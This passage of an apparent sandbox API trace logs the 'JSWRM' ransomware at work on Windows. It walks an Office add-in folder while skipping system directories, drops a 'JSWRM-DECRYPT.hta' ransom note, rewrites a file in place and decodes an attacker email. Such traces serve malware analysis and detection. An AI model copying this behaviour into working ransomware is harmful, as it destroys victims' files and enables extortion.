CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0125.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0125.785] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x54ef2e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x54ef2e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0125.785] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0125.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0125.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0125.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0125.785] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d9e0b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d9e0b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d9e0b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e40, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0125.785] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0125.785] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0125.785] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0125.786] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0125.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0125.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.786] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d9e0b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d9e0b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d9e0b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e40, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0125.786] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0125.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0125.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0125.786] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0125.786] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="...") returned 1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="windows") returned -1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="recovery") returned -1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="perflogs") returned -1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="documents and settings") returned -1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="$RECYCLE.BIN") returned 1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="system volume information") returned -1 [0125.786] lstrcmpiW (lpString1="bg", lpString2="msocache") returned -1 [0125.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0125.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0125.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0125.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0125.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\jswrm-decrypt.hta")) returned 0xffffffff [0125.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0125.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0125.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0125.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0125.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.788] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.789] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.790] CloseHandle (hObject=0x314) returned 1 [0125.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0125.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0125.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0125.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0125.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0125.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\jswrm-decrypt.hta")) returned 0x20 [0125.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0125.790] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41a2e128, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0125.790] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.790] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41a2e128, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0125.797] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.797] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.797] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a2e128, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41a2e128, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41a2e128, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0125.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0125.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.798] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x165b9401, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1639, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0125.798] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241358, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0125.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0125.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0125.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0125.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.800] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=5689) returned 1 [0125.800] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1630) returned 0x278330 [0125.800] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1630, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1630, lpOverlapped=0x0) returned 1 [0125.804] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.804] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1630, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1630, lpOverlapped=0x0) returned 1 [0125.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.804] CloseHandle (hObject=0x338) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0125.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 